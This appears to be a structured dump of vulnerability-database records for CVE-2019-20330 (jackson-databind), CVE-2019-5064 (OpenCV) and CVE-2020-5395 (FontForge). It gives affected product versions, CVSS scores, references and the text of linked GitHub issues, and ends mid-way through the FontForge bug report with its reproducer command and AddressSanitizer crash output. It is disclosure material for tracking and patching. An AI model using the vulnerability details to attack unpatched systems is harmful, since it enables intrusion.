[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "2F87CF67-6994-43F1-BEC3-DD7D122D0146", "versionEndExcluding": "2.7.9.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "BF323F3D-B2A4-41E7-94F9-5539C9B7025E", "versionEndExcluding": "2.8.11.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "2AE46C31-B9B7-48D7-8AC7-CF431317D50E", "versionEndExcluding": "2.9.10.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "5343F8F8-E8B4-49E9-A304-9C8A608B8027", "versionEndExcluding": null, "versionEndIncluding": "2.9.0", "versionStartExcluding": null, "versionStartIncluding": "2.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:*", "matchCriteriaId": "790A89FD-6B86-49AE-9B4F-AE7262915E13", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "E39D442D-1997-49AF-8B02-5640BE2A26CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:1.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "ADE6EF8F-1F05-429B-A916-76FDB20CEB81", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "113E281E-977E-4195-B131-B7C7A2933B6E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "987811D5-DA5E-493D-8709-F9231A84E5F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "0DB23B9A-571E-4B77-B432-23F3DC9B67D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*", "matchCriteriaId": "2AB443D1-D8E0-4253-9E1C-B62AEBBE582A", "versionEndExcluding": null, "versionEndIncluding": "12.0.3", "versionStartExcluding": null, "versionStartIncluding": "12.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "ECC00750-1DBF-401F-886E-E0E65A277409", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*", "matchCriteriaId": "727DF4F5-3D21-491E-96B9-EC973A6C9C18", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "7582B307-3899-4BBB-B868-BC912A4D0109", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "F6455EB1-C741-45E8-A53E-E7AD7A5D00EE", "versionEndExcluding": "11.2.0.3.23", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "BFD43191-E67F-4D1B-967B-3C7B20331945", "versionEndExcluding": "12.2.0.1.19", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "12.2.0.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "062C588A-CBBA-470F-8D11-2F961922E927", "versionEndExcluding": "13.9.4.2.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "13.9.4.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:goldengate_application_adapters:19.1.0.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "E7BE0590-31BD-4FCD-B50E-A5F86196F99E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "F4E7F2AA-B851-4D85-9895-2CDD6BE9FCB4", "versionEndExcluding": "19.1.0.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E46AE88-E9F8-41CB-B15F-12F5127A1E8D", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3D635AE-5E4A-47FB-9FCA-D82D52A61367", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", "matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", "versionEndExcluding": null, "versionEndIncluding": "17.12", "versionStartExcluding": null, "versionStartIncluding": "17.7", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", "matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", "matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", "matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", "matchCriteriaId": "10864586-270E-4ACF-BDCC-ECFCD299305F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_merchandising_system:15.0.3:*:*:*:*:*:*:*", "matchCriteriaId": "E7C9BB48-50B2-4735-9E2F-E492C708C36D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_merchandising_system:16.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "4A848888-0A4A-4B6D-8176-9A2685B37AC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_merchandising_system:16.0.3:*:*:*:*:*:*:*", "matchCriteriaId": "F8383028-B719-41FD-9B6A-71F8EB4C5F8D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "7DA6E92C-AC3B-40CF-96AE-22CD8769886F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "11DA6839-849D-4CEF-85F3-38FE75E07183", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "BCE78490-A4BE-40BD-8C72-0A4526BBD4A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*", "matchCriteriaId": "55AE3629-4A66-49E4-A33D-6D81CC94962F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*", "matchCriteriaId": "4CB39A1A-AD29-45DD-9EB5-5E2053A01B9A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*", "matchCriteriaId": "27C26705-6D1F-4D5E-B64D-B479108154FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:siebel_engineering_-_installer_\\&_deployment:*:*:*:*:*:*:*:*", "matchCriteriaId": "A83C7FAE-9848-427E-88F8-BFA24134A84B", "versionEndExcluding": null, "versionEndIncluding": "2.20.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:siebel_ui_framework:*:*:*:*:*:*:*:*", "matchCriteriaId": "F510ED6D-7BF8-4548-BF0F-3CF926EB135E", "versionEndExcluding": null, "versionEndIncluding": "20.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:trace_file_analyzer:12.2.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "EDB52969-7705-47CF-BD55-5632C56A7FD1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:trace_file_analyzer:18c:*:*:*:*:*:*:*", "matchCriteriaId": "67107890-A521-47E7-BC10-00635C85BEC4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:trace_file_analyzer:19c:*:*:*:*:*:*:*", "matchCriteriaId": "9B3C1811-E651-4975-A1AE-BCE3377D51A0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "D6A4F71A-4269-40FC-8F61-1D1301F2B728", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:webcenter_portal:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "5A502118-5B2B-47AE-82EC-1999BD841103", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "F14A818F-AA16-4438-A3E4-E64C9287AC66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*", "matchCriteriaId": "9FBC1BD0-FF12-4691-8751-5F245D991989", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*", "matchCriteriaId": "BD075607-09B7-493E-8611-66D041FFDA62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "0CB28AF5-5AF0-4475-A7B6-12E1795FFDCB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "9.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", "matchCriteriaId": "5EC98B22-FFAA-4B59-8E63-EBAA4336AD13", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:service_level_manager:-:*:*:*:*:*:*:*", "matchCriteriaId": "7081652A-D28B-494E-94EF-CA88117F23EE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", "matchCriteriaId": "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2526
[ "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another 2 gadget (*) types reported related to JNDI access. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2019-20330 Original discoverer: UltramanGaia Fixed in: * 2.9.10.2 (`jackson-bom` version `2.9.10.20200223`) * 2.8.11.5 (`jackson-bom` version `2.8.11.20200210`) * 2.7.9.7 * does not affect 2.10.0 and later
Block two more gadget types (ehcache/JNDI - CVE-2019-20330)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2526/comments
3
2019-10-25T20:55:07Z
2020-03-10T17:49:23Z
https://github.com/FasterXML/jackson-databind/issues/2526
512,716,891
2,526
978
CVE-2019-5064
2020-01-03T17:15:12.257
An exploitable heap buffer overflow vulnerability exists in the data structure persistence functionality of OpenCV, before version 4.2.0. A specially crafted JSON file can cause a buffer overflow, resulting in multiple heap corruptions and potentially code execution. An attacker can provide a specially crafted file to trigger this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "talos-cna@cisco.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "talos-cna@cisco.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/opencv/opencv/issues/15857" }, { "source": "talos-cna@cisco.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2019-0853" }, { "source": "talos-cna@cisco.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "talos-cna@cisco.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/opencv/opencv/issues/15857" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2019-0853" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opencv:opencv:*:*:*:*:*:*:*:*", "matchCriteriaId": "BE654103-94F6-44DF-A86F-47DED6FB9117", "versionEndExcluding": "4.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "A125E817-F974-4509-872C-B71933F42AD1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:big_data_spatial_and_graph:*:*:*:*:*:*:*:*", "matchCriteriaId": "65BF66DA-D1EF-4BF3-81F5-C36C29C63710", "versionEndExcluding": "2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/opencv/opencv/issues/15857
[ "Third Party Advisory" ]
github.com
[ "opencv", "opencv" ]
The Cisco Talos team found two security vulnerabilities affecting Opencv OpenCV 4.1.0. As this is a sensitive security issue, this message is to request a point of contact to report the detailed report. Email requests to admin at opencv.org were also sent.
Talos security advisory for Opencv (TALOS-2019-0852, 0853)
https://api.github.com/repos/opencv/opencv/issues/15857/comments
7
2019-11-06T16:00:12Z
2020-01-02T20:22:41Z
https://github.com/opencv/opencv/issues/15857
518,566,952
15,857
979
CVE-2020-5395
2020-01-03T20:15:12.653
FontForge 20190801 has a use-after-free in SFD_GetFontMetaData in sfd.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00041.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/fontforge/fontforge/issues/4084" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00007.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2S75EAVF4KPCH3WFBMZADUAU7EAXA7ZQ/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MH6PKVQLBKIO7LQPDXB3MKI5I6AMDCN6/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202004-14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00041.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/fontforge/fontforge/issues/4084" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00007.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2S75EAVF4KPCH3WFBMZADUAU7EAXA7ZQ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MH6PKVQLBKIO7LQPDXB3MKI5I6AMDCN6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202004-14" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fontforge:fontforge:20190801:*:*:*:*:*:*:*", "matchCriteriaId": "B87AF8DA-5CBE-4497-A0EF-779E168C2381", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/fontforge/fontforge/issues/4084
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "fontforge", "fontforge" ]
Hi, While fuzzing FontForge with AFL, I found a heap use-after-free in the SFD_GetFontMetaData() function, in sfd.c. Attaching a reproducer (gzipped so GitHub accepts it): [test01.sfd.gz](https://github.com/fontforge/fontforge/files/4019970/test01.sfd.gz) Issue can be reproduced in FontForge 20190801 and with latest Git master by running: ``` fontforge test01.sfd ``` ``` ================================================================= ==7418==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030000c8068 at pc 0x7f60f1122f2d bp 0x7fff16e6ff70 sp 0x7fff16e6f718 WRITE of size 48 at 0x6030000c8068 thread T0 #0 0x7f60f1122f2c (/usr/lib/x86_64-linux-gnu/libasan.so.5+0x67f2c) #1 0x7f60ef2c7850 in SFD_GetFontMetaData /home/fcambus/fontforge-20190801/fontforge/sfd.c:8008 #2 0x7f60ef2ccf66 in SFD_GetFont /home/fcambus/fontforge-20190801/fontforge/sfd.c:8502 #3 0x7f60ef2d3e0f in SFD_Read /home/fcambus/fontforge-20190801/fontforge/sfd.c:9077 #4 0x7f60ef2d4360 in _SFDRead /home/fcambus/fontforge-20190801/fontforge/sfd.c:9110 #5 0x7f60ef32d7bd in _ReadSplineFont /home/fcambus/fontforge-20190801/fontforge/splinefont.c:1178 #6 0x7f60ef32f0bf in ReadSplineFont /home/fcambus/fontforge-20190801/fontforge/splinefont.c:1321 #7 0x7f60ef32f591 in LoadSplineFont /home/fcambus/fontforge-20190801/fontforge/splinefont.c:1379 #8 0x7f60eeeedbbc in ViewPostScriptFont /home/fcambus/fontforge-20190801/fontforge/fontviewbase.c:1347 #9 0x7f60f0d3c89e in fontforge_main /home/fcambus/fontforge-20190801/fontforgeexe/startui.c:1392 #10 0x557137b971ec in main /home/fcambus/fontforge-20190801/fontforgeexe/main.c:33 #11 0x7f60f03c81e2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x271e2) #12 0x557137b9710d in _start (/home/fcambus/fontforge-20190801/fontforgeexe/.libs/fontforge+0x110d) 0x6030000c8070 is located 0 bytes to the right of 32-byte region [0x6030000c8050,0x6030000c8070) freed by thread T0 here: #0 0x7f60f11c86ef in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.5+0x10d6ef) #1 0x7f60ee24c014 in _XReply (/usr/lib/x86_64-linux-gnu/libX11.so.6+0x40014) previously allocated by thread T0 here: #0 0x7f60f11c8ae8 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.5+0x10dae8) #1 0x7f60ed7a3cfd (/usr/lib/x86_64-linux-gnu/libxcb.so.1+0xdcfd) SUMMARY: AddressSanitizer: heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.5+0x67f2c) Shadow bytes around the buggy address: 0x0c0680010fb0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x0c0680010fc0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x0c0680010fd0: fd fd fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x0c0680010fe0: fd fd fd fa fa fa fd fd fd fd fa fa 00 00 04 fa 0x0c0680010ff0: fa fa 00 00 00 00 fa fa fd 